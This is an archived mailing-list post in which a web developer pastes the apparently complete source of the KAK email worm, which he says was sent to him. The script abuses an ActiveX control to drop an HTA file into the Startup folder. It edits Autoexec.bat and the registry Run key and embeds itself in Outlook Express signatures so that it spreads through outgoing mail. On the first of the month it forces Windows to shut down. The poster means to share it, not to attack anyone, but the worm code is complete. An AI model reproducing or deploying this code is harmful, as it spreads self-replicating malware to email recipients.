Hope this doesn't screw up anyones HTML mail, that's why I am taking
out the scriopt in it, but it was just surrounded by a script tag. Someone
sent this to me and I just happened to be checking this with web based
email.
<!--
function sErr(){return true;}
window.onerror=sErr;scr.Reset();
scr.doc="Z<HEAD><TITLE>Driver Memory Error</"+"TITLE><HTA:APPLICATION
ID=\"hO\" WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object
id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIPT>fun
ction sEr(){self.close();return true;}window.onerror=sEr;fs=new
ActiveXObject('Scripting.FileSystemObject');wd='C:\\\\Windows\\\\';fl=fs.Get
Folder(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new
Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=mye.item();ids=new
String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=wd+'MENUDÉ~1\\\\PRO
GRA~1\\\\DÉMARR~1\\\\kak.hta';ken=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak
.hta';k2=wd+'System\\\\'+fic+'.hta';kk=(fs.FileExists(kfr))?kfr:ken;aek='C:\
\\\AE.KAK';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(aek)){re=/kak.hta/i;if
(hO.commandLine.search(re)!=-1){f1=fs.GetFile(aeb);f1.Copy(aek);t1=f1.OpenAs
TextStream(8);pth=(kk==kfr)?wd+'MENUD~1\\\\PROGRA~1\\\\DMARR~1\\\\kak.hta'
:ken;t1.WriteLine('@echo off>'+pth);t1.WriteLine('del
'+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2)
.Attributes=2;}t2=fs.CreateTextFile(wd+'kak.reg');t2.write('REGEDIT4');t2.Wr
iteBlankLines(2);ky='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software
\\\\Microsoft\\\\Outlook
Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Defa
ult
Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\000
00000]');t2.WriteLine('\"name\"=\"Signature
#1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLine('\"text\"=\"\"')
;t2.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLine
s(2);t2.WriteLine(ky+']');t2.Write('\"Signature
Flags\"=dword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MAC
HINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Writ
e('\"cAg0u\"=\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.Wri
teBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s
'+wd+'kak.reg');t3=fs.CreateTextFile(wd+'kak.htm',1);t3.Write('<BODY><DIV
style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT
classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
id=scr></"+"OBJECT></"+"DIV>');t4=fs.OpenTextFile(k2,1);while(t4.Read(1)!='Z
');t3.WriteLine('<SCRIPT><!--');t3.write('function sErr(){return
true;}window.onerror=sErr;scr.Reset();scr.doc=\"Z');rs=t4.Read(3095);t4.clos
e();rd=/\\\\/g;re=/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'
\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=(navigator.systemLa
nguage)?navigator.systemLanguage:navigator.language;scr.Path=(la==\"fr\")?\"
C:\\\\\\\\windows\\\\\\\\Menu
Démarrer\\\\\\\\Programmes\\\\\\\\Démarrage\\\\\\\\kak.hta\":\"C:\\\\\\\\win
dows\\\\\\\\Start
Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=navigator.userAgent
.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersi
on)>4))||(agt.indexOf(\"msie
5.\")!=-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></"+"
'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.
DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 &&
d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today
!');wsh.Run(wd+'RUNDLL32.EXE
user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc
failed
!]]%%%%%</"+"BODY></"+"HTML>";la=(navigator.systemLanguage)?navigator.system
Language:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu
Démarrer\\Programmes\\Démarrage\\kak.hta":"C:\\windows\\Start
Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if((
(agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf
("msie 5.")!=-1))scr.write();
//-->
Robert Everland III
Web Developer
Dixon Ticonderoga
------------------------------------------------------------------------------
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebarRsts&bodyRsts/cf_talk or send a message
to [EMAIL PROTECTED] with 'unsubscribe' in the body.
